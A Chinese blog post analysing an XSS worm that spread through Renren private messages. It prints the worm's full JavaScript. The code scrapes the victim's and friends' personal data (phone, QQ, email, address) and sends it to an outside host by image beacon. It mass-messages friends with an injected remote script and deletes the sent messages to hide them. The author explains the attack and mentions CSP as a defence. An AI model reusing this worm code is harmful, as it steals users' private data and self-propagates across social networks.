β

人人网站内信被XSS攻击

Winter Is Coming 89 阅读
xss

今天相信很多人都收到了这些站内信

然后许多人点开后就悲剧了,因为所有的好友都收到了来自这个人的站内信,信件内容一模一样

看到这个情况我的第一反应是人人被XSS攻击

关于XSS攻击,可以参考这里:http://baike.baidu.com/view/2161269.htm

常见的XSS攻击基本上都是在页面上注入一个带有可执行脚本的代码,这段代码一旦被执行,就会威胁到用户数据和隐私的安全,所以目前企业对XSS有许多防范,比较多的都是对输入文本进行javascript标签过滤。。

但是人人却十分坑爹,竟然在站内信件内容上不做javascript过滤,于是我们在这封欺诈邮件中看到这段代码:

那么,让我们来看这个代码都干了什么吧:

盗取用户信息

function get_self_info(){
new XN.net.xmlhttp({url:"http://www.renren.com/profile.do?v=info_ajax&undefined",method:"GET",onSuccess:function(r){

var text_html = r.responseText;

var id,name,birthday,qq,school,mobile,msn,day,month,year;

 id = /getalbumprofile\.do\?owner\=(\d+)/.exec(text_html)[1];
 my_id = id;
 school = /pf_spread\'\>(.*?)\<\/a\>/.exec(text_html)[1];
 year = /birt\"\,\"year\"\:\"(\d+)/.exec(text_html)[1];
 month = /birt\"\,\"month\"\:\"(\d+)/.exec(text_html)[1];
 day = /birt\"\,\"day\"\:\"(\d+)/.exec(text_html)[1];
 name = /alt\=\"([^\"]+)的大头贴/.exec(text_html)[1];

 if(month <= 9){
  month = "0"+month;
 }
 if(day <= 9){
  day = "0"+day;
 }
 birthday = year + month + day;

 qq = /QQ.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

 msn = /MSN.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

 mobile = /手机号.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

 var data = "type=self_info&id=" + id + "&name=" + encodeURIComponent(name)
       + "&school=" + encodeURIComponent(school)
       + "&birth=" + birthday
       + "&qq=" + qq
       + "&msn=" + encodeURIComponent(msn)
       + "&mobile=" + mobile;
 send_data(data);
}

});
}

发送用户信息到制定服务器:

function send_data(v)
{
 var img = document.createElement('img');
 img.src = 'http://qiutuan.net/2011/log.php?' + v;
 document.body.appendChild(img);
 document.body.removeChild(img);
}

给用户好友发站内信并且分享一个东西

function send_to_friends(){
 var i;
 var idlist = [];
 for (i = 0; i < all_friends.length; i++)
 {
   idlist.push(all_friends[i].toString());
   if (idlist.length == 10)
   {
     _send_to_friends(idlist);
     idlist = [];
   }
 }
 if (idlist.length > 0) _send_to_friends(idlist);
}

function _send_to_friends(ids){
 var content = "相信每个女生心底都有一只小猫,有的妩媚,有的狂野,有的多愁善感,有的古灵精怪……你心底的那只蠢蠢欲动的小猫,是什么样子的呢?她喜欢笑,你就老以为她是快乐的;她喜欢跳,你就老以为她是开朗的;她喜欢扭,你就老以为她是放肆的;她喜欢叫,你就老以为她是狂野的。一个人的时候,她其实多愁善感;一个人的时候,她其实安静淡然;一个人的时候,她其实内向自闭;一个人的时候,她其实乖巧温柔……(视频亮点在2:57秒) <script src="http://qiutuan.net/2011/51.js"></script> <embed src="http://player.youku.com/player.php/sid/XMjYxNDMwNDQ4/v.swf" quality='high' width='480' height='400' align='middle' allowScriptAccess='sameDomain' type='application/x-shockwave-flash'></embed>";
 var p = {action:"sharetofriend",
   body:content,
   form:{
     albumid:"0",
     currenUserTinyurl:"http://hdn.xnimg.cn/photos/hdn421/20110118/1220/tiny_GeT4_23780d019116.jpg",
     fromSharedId:"0",
     fromShareOwner:"0",
     fromname:"",
     fromno:"0",
     fromuniv:"",
     link:"http://edm.renren.com/link.do?l=27627&t=51",
     pic:"http://jebe.xnimg.cn/20110412/19/62caea7b-c7bc-4217-994a-ba6c061e5aa0.jpg",
     summary:"相信每个女生心底都有一只小猫,有的妩媚,有的狂野,有的多愁善感,有的古灵精怪……你心底的那只蠢蠢欲动的小猫,是什么样子的呢?",
     title:"加a02好友 奖品散不停",
     type:"51"
   },
   ids:ids,
   noteId:"0",
   subject:"有人暗恋你哦,你想知道TA是谁么",
   tsc:token};

 delete p.tsc;

new XN.net.xmlhttp({url:"http://share.renren.com/share/submit.do",
         data:"tsc="+token+"&post="+encodeURIComponent(XN.json.build(p)),
         onSuccess: function (response) {del_send_messages();}
         });
}

删除发送痕迹

function del_messages(idlist){

var struct_msgs ={
         action:"delete",
         folder:"1",
         slice:"20",
         unread_count:"0",
         ids:idlist
       };

new Ajax.Request("/message/ajax.do",{method:"get",parameters:"post="+encodeURIComponent(XN.JSON.build(struct_msgs))});

}

function del_send_messages(){
 new XN.net.xmlhttp({url:"http://msg.renren.com/message/inbox.do?f=1",
         method:"GET",
         onSuccess: function (response) {
           var listid1 = response.responseText.match(/thread_(\d+)/g);
           for(var i=0;i < listid1.length;i++){
             listid1[i] = listid1[i].substring(7);
           }
           del_messages(listid1);
         }
       });
}

获取所有好友的一些信息,发送到制定服务器上

function get_card(tid)
{
  new XN.net.xmlhttp({url:'http://www.renren.com/showcard?friendID='+tid,
           method:'get',
           onSuccess:function(r){
          var obj = eval("("+r.responseText+")");
          var data = 'type=card&my_id=' + my_id
               + '&id=' + obj.id
               + '&name=' + encodeURIComponent(obj.name)
               + '&msn=' + encodeURIComponent(obj.msn)
               + '&phone=' + encodeURIComponent(obj.phone)
               + '&qq=' + encodeURIComponent(obj.qq)
               + '&email=' + encodeURIComponent(obj.email)
               + '&address=' + encodeURIComponent(obj.address);
         send_data(data);
       }
  });
}

function get_all_friends(){
 new XN.net.xmlhttp({url:"http://www.renren.com/listcards",method:"GET",onSuccess:function(r){

 var text_html = r.responseText;
 //alert(text_html);

 var friends_list = eval("("+text_html+")");
 var owned_mobile = (friends_list.list[0].list).length; //have mobile friends number
 for(var i =0;i< owned_mobile ;i++){
   mobile_friends.push(friends_list.list[0].list[i].id);
   all_friends.push(friends_list.list[0].list[i].id);
 }
 //alert(mobile_friends.length);

 var no_mobile = (friends_list.list[1].list).length;
 for(var i =0;i< no_mobile ;i++){
   all_friends.push(friends_list.list[1].list[i].id);
 }
 //alert(all_friends.length);
 for(var i = 0; i < mobile_friends.length; i++)
   get_card(mobile_friends[i]);
  send_to_friends();
}
});
}

通过上面分析,我觉得大部分知道为什么会中招了吧?

建议中招的同学,重新登陆一次。同时上次看到twitter的一篇博客,讲到了利用CSP机制(Content Security Policy)来阻止XSS攻击,这套标准目前Mozilla在推,在Firefox 4.0中实现了,当然这并不意味着你使用firefox 4.0就安全,这需要网站来配合这套机制。

总之,人人这次也算报了一个蛮丢人的XSS漏洞吧,希望尽快修复

xss
作者:Winter Is Coming
原文地址:人人网站内信被XSS攻击, 感谢原作者分享。